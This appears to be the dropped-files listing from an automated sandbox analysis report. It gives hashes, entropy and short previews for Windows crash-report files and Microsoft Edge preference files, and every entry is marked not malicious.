Preview:Version=1 EventType=BEX64 EventTime=133783261471529291 ReportType=2 Consent=1 UploadTime=133783261477452407 ReportStatus=524384 ReportIdentifier=5d860d82-9311-438e-aaeb-90aad6a8029f IntegratorReportIdentifier=f15c19d5-d79d-4bfe-8282-aab41aa8f789 Wow64Host=34404 NsAppName=fontdrvhost.exe OriginalFilename=fontdrvhost.exe AppSessionGuid=00001cd0-0001-0014-0acc-7fde2a4bdb01 TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!00005efb3f97342ba195424134f28f977da9e0d6aa91!fontdrvho
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 17:42:27 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):46742
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.3023349648653901
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:5m8Ggr2DPbRcFjIyKQM7i7kTAc1T0PAq7NPwd2EGxWIFzIoqX:r9rEPU9COk9d0PAqh82EG3g
                                                                                                                                                                                                                                                                                  MD5:1D7AA1B126B114F790145384EEACFA47
                                                                                                                                                                                                                                                                                  SHA1:A5A10B406D2F05B25AD34388834221486CC1035C
                                                                                                                                                                                                                                                                                  SHA-256:06C1A8EEB2409769CF62A3AA41C71437CC638821E239C772C2DF75C8671B67A4
                                                                                                                                                                                                                                                                                  SHA-512:F02064FCB11139B065F8D0E007E60DC799110058F6122A2E6BB4BC94565193637C16B08D273994DB5C8BCFAC38B9310391416A318BC76276DBE978302A5858D5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8620
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.689080304100551
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJ/ohSI6YW7Bs74gmfr57vspDM89bZTsVkfBSzm:R6lXJw76YqBs0gmfrFv4ZTsmfBf
                                                                                                                                                                                                                                                                                  MD5:22A216AB67BB1B65BCA4ED329A568919
                                                                                                                                                                                                                                                                                  SHA1:E8BACF5F41CA2DDDF761FBD0E4AB5EB0791BF14C
                                                                                                                                                                                                                                                                                  SHA-256:E976F98E267A08363A7B0B4C17BC65C2AFB50F6B7A537D8B70ABCD3A7CB0C144
                                                                                                                                                                                                                                                                                  SHA-512:C55F3C679A195BCE967DA935E25B523B74110BE7FA13C9921D935DAF87E93D261BD3BC9A8307E0D4D743A79C1E0AFA0CFE914C1F8E288101B431FF12D67BCD5B
                                                                                                                                                                                                                                                                                  Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>7376</Pi
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4853
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.439923606216681
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zsAJg771I93EWpW8VYsYm8M4Jk5LvM6Fdyq8vU5LvMBFXaMuNFd:uIjfGI7Ed7VcJcjMiWsjMBFX1u3d
                                                                                                                                                                                                                                                                                  MD5:34F0D2E311DCBDAA7E739F655BDF62BF
                                                                                                                                                                                                                                                                                  SHA1:61B7B47FB1081C780CBBD8A8B11A4C1A8E16CBCB
                                                                                                                                                                                                                                                                                  SHA-256:E97081A08709CBEAC6DE2C6525D829BB4DE03C2B205AD6E614DE6C92A653D041
                                                                                                                                                                                                                                                                                  SHA-512:4BE97E3A8D40C68AF3E5B725D342BDC239C1159C50992E59434B48ABDCCA576C7F8E4800FDAEB0087A9B4BE38204C2660810F0B03CACEC68C070331123BC97CE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625485" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8094
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.801504342613856
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:asNAjszeiRUsDQ9k1R6qRAq1k8SPxVLZ7VTiq:asNAo3BEO1R6q3QxVNZTiq
                                                                                                                                                                                                                                                                                  MD5:361AF16EBFBF3F223DF2813E97D09D78
                                                                                                                                                                                                                                                                                  SHA1:46F629C0D62B55EBD9F2D3EF7013499EA1EA7F8B
                                                                                                                                                                                                                                                                                  SHA-256:549921CCFE22E12E3404683200A85876F4CC0773051F4C140F9E18CE3BCD1BC5
                                                                                                                                                                                                                                                                                  SHA-512:1D8D506E4FB006EEEBBDA87E63A31C997850C646745F8E6C77C18A800E7E9E52F8419C95BF1BD44BA4AC82367462747893F35D34910605AABEE6667CCA865FDF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9437
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.589197043255668
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:uugqsNk5hdRfbpq3N16Qih/cIyURLl8Rotoe+2vBA2Vvljxf5hZkNUje4WJk1chJ:u+sNwh7sWViRUdAIxBhaNUOk1iVG+
                                                                                                                                                                                                                                                                                  MD5:951210B24955FAF6711225B56ED89D1D
                                                                                                                                                                                                                                                                                  SHA1:A06D26AE9B4A6BD71B9DC32AD5D7EE870403AF32
                                                                                                                                                                                                                                                                                  SHA-256:90E81CEA78D8C1721F9196F37B1757C384EB042255A19317D55DFCAB1854955C
                                                                                                                                                                                                                                                                                  SHA-512:2E9BC13064648AA78FB2D23999E3C6A0E7331597E545D3C1176684BDDFBEACBD6D259A6F6BB6472E318E728B5719A6E2DC43282C41F3CB126A6385B806806451
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326089487259","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852494"},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfro
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8325
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.790224075965744
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:fsNwjszeiRUOejIk1y6qRAq1k8SPxVLZ7VTiQ:fsNwo3jkT1y6q3QxVNZTiQ
                                                                                                                                                                                                                                                                                  MD5:1DD347BF7E375ED93FAA9D2120384BA9
                                                                                                                                                                                                                                                                                  SHA1:207043ECC35A227C87F1F2D2424F9246C61E69BA
                                                                                                                                                                                                                                                                                  SHA-256:2963D11A066BA03DB3BA3835761315BF9F32FECDEC61D40E011FE8F7603CDD95
                                                                                                                                                                                                                                                                                  SHA-512:AAAEE7AC23B6103D97DC230EC019BFE400C6B6D33556CC4D7732C664D21D36DBBBC5BF18915B6522DE073346702AC728B0E3D1DA45B173785DFEF42B3A446FA7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8411
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.487346471196526
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:uugqsNk5hdRfbpq3N16Qih/cIyURLl8Rotoe+2vBA2VvlIk2ZjwSe4WJk1cZwbz0:u+sNwh7sWViRUdA22jIk1OGq
                                                                                                                                                                                                                                                                                  MD5:AB70A63DC9A58570F48C1563229C8D8E
                                                                                                                                                                                                                                                                                  SHA1:29684333C89C9C7FF8085D0731D368100F8A8AD4
                                                                                                                                                                                                                                                                                  SHA-256:0B0F3CD6A46FD04D45B2020427C68364660DC51970C48DBF976B1BA1ABB1B84D
                                                                                                                                                                                                                                                                                  SHA-512:C5C0AF2B51901F589C0976238093F180E516C079CC832350982D6472F88AAA99F0E9DFE239586D1483251B3647CAC0456300E44D53F1F58E86A0A09B8B706BCA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326089487259","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852494"},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfro
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8243
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.7962904755097036
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:fsNAjszeiRUdejIk1y6qRAq1k8SPxVLZ7VTiQ:fsNAo3WkT1y6q3QxVNZTiQ
                                                                                                                                                                                                                                                                                  MD5:FFBA575C79F0A715D10589C0313AED54
                                                                                                                                                                                                                                                                                  SHA1:E9C8040D34B03A847BC1576C2D5F1733DD2E9D8F
                                                                                                                                                                                                                                                                                  SHA-256:1EF301B9DDE9872F7D34FF689051CB1D73541E278DCD9EA10E9410692B3C9FD1
                                                                                                                                                                                                                                                                                  SHA-512:6DD34E7F1553043A4ED18B2D05484B55DF450C8802DA6E43B4D0945BDEF4B3BF98377DC3CF1FF82E5F22C1F9FE3936116905CA4C7AD88779B9712150D160EFA8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Ve
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):25075
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.029577434041161
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:eMkbJrT8IeQc5/19wibvNfT1tKoAOY1NiM:eMk1rT8Hn1lK1NiM
                                                                                                                                                                                                                                                                                  MD5:5222345C92F42225DFF11904EFB9EFB6
                                                                                                                                                                                                                                                                                  SHA1:2586291C41985A8DD7B09B0C6F14A6B29379A986
                                                                                                                                                                                                                                                                                  SHA-256:18B063754659EEECEB01ADD16AB095F1C21956F811220538E00E7AB28CFC1A3C
                                                                                                                                                                                                                                                                                  SHA-512:C32F492287F3074A63DD207FECC16FA5E95FB0530413D2852B0EDE570763F48E79D24D26069C7D9C02B95467687DBCC31575F5CF4237D28D5615B343AE627D39
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9425
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.579639064610539
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:uugqsNk5hdRfbpq3N16Qih/cIyURLl8Rotoe+2vBA2Vvljxf5hZkHy+e4WJk1cc2:u+sNwh7sWViRUdAIxBhaHyPk1UVG+
                                                                                                                                                                                                                                                                                  MD5:1BFF5EFB26CFB5BB603EFF4B1537B865
                                                                                                                                                                                                                                                                                  SHA1:53B7BCF80820A9243D4C87602D8E3BC20963D4CD
                                                                                                                                                                                                                                                                                  SHA-256:13DACE0E00870072708E35FF049CC767BD94F05CC442AC6B12DC5DEAA92189AC
                                                                                                                                                                                                                                                                                  SHA-512:0976F2B1EE3DCEDC9F310666BD81C152EC0F027195A821F7FEF413DED049BAFB0A76DC9B3ABB6798315045DD098EE4C99EE3E72AEC2AB41BDB8CCCF9FF9F79B8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):25126
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.028741197222406
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:eMkbJrT8IeQc5/k9wibvNnT1tKoAOY1NiM:eMk1rT8HnkBK1NiM
                                                                                                                                                                                                                                                                                  MD5:35558485374BEA3357033F2D6997E7CF
                                                                                                                                                                                                                                                                                  SHA1:F7D47366454233D6F1F4F882C9720C7605A959AD
                                                                                                                                                                                                                                                                                  SHA-256:B233697A049EE89F9D0CD5E3F0EC6DE5E2B52003AE0BA8FF15F45F095FF3352D
                                                                                                                                                                                                                                                                                  SHA-512:DEDDC94482288FE0B21ADC7C328260CD9752EA75184BB69018FEB168F4E6732A533CE81F41418D1450F30D841F40722C67538B3B74FDF163C31358A8E75DE3CB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):25075
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.029552373515792
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:eMkbJrT8IeQc5/19wibvNnT1tKoAOY1NiM:eMk1rT8Hn1BK1NiM
                                                                                                                                                                                                                                                                                  MD5:70596728571390726A1FD55C39930F53
                                                                                                                                                                                                                                                                                  SHA1:7C6F1BB9B71A39E7DFFAE674C86366B6139095F1
                                                                                                                                                                                                                                                                                  SHA-256:6D20CA003AC0C4D0994123F1D96DB27EE81708ACB39008C56FF4B893AE2F558C
                                                                                                                                                                                                                                                                                  SHA-512:C8114B7F1459068F89DB4C698D2FAB7181045BA775858B737C66D380051EECE314887EC7ECCDF8E19C3A7649092187D53BC6CD44381AFDB6FE28418268F4AD39
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                  MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                  SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                  SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                                  SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                  MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                  SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                  SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                                  SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.03996465525118641
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:vSy01utmqvDDYMhJvyqlBqfr3nXgXX3OD5DhKfINEydMGRQ83SDOn8y08Tcm2RGY:j0EttSQoh/TNzSDO08T2RGOD
                                                                                                                                                                                                                                                                                  MD5:1D36DE2A91E747609E7CAEB382EF6484
                                                                                                                                                                                                                                                                                  SHA1:38BFEFE4C528FD0A4F732D1CA9F9544F4DC3D925
                                                                                                                                                                                                                                                                                  SHA-256:DDE90DEADEEAF92FD0DB4731C66DE30C7822CB3B5F0497A47C5F4CBDDC53B868
                                                                                                                                                                                                                                                                                  SHA-512:E7ADE78C3BE2813A56F249EEB54DE220DF3537FC6C5813CD2AEF0D368308BBE57617DE9C17324179254B7A2448576D372952001805536818E3682046A2D26F25
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4380456473510811
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6144:ThY/seug5z5KlaH4W1dfoZY8UNLS7tmaHq:w3p5KE1gLtd
                                                                                                                                                                                                                                                                                  MD5:F5E34F5487AD738F7A99F05AA94B46D2
                                                                                                                                                                                                                                                                                  SHA1:D0F737AD506F7AF3B0950D9FD202BB85FECEDB67
                                                                                                                                                                                                                                                                                  SHA-256:491898951A70575989657BE383F382B5D161EED20E4BE808654EEA4CBB6D1E15
                                                                                                                                                                                                                                                                                  SHA-512:B4AA837461EF5E8F236DBF314D6283F911937D9CE9ECC9BDD62A623F0589E938907BC644149FA6DD23E4D10B3D271BC16DE367125B4A784B64FA85504C1536EC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.039015243486150736
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:/S+0EbZmqvDEKXWJEaIX1gzNg7X0CQ0Ug8vYhdQNngu1gQMxv2I9n8y08Tcm2RGY:f0EZkeHqiUshSe6gFvj08T2RGOD
                                                                                                                                                                                                                                                                                  MD5:4CD5083888331163E4264E7486B0DA43
                                                                                                                                                                                                                                                                                  SHA1:966E45F8B07E90FC3228D07707148F7328209C34
                                                                                                                                                                                                                                                                                  SHA-256:6FD555C7F08EE82C6E806A2BDE0F013EFC3898BB39328B8E56F38C0C1158A565
                                                                                                                                                                                                                                                                                  SHA-512:1C20403097EE60347C8611BC63D205E47BC99850D57BA8BB66BF2C750BC7D48880CEEFAD9937F5E6F18BB59D7F1ED9FC4A4B1B6E42366193AADCA53E5727206D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.03992101248243327
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:em0EbZmqvD3KX79JEa3Xxx7uqZGXPtg34khtbNEk8AMj1gQpeVUD65mTn8y08Tcp:D0EZUe18xphlXuZgwGUD+k08T2RGOD
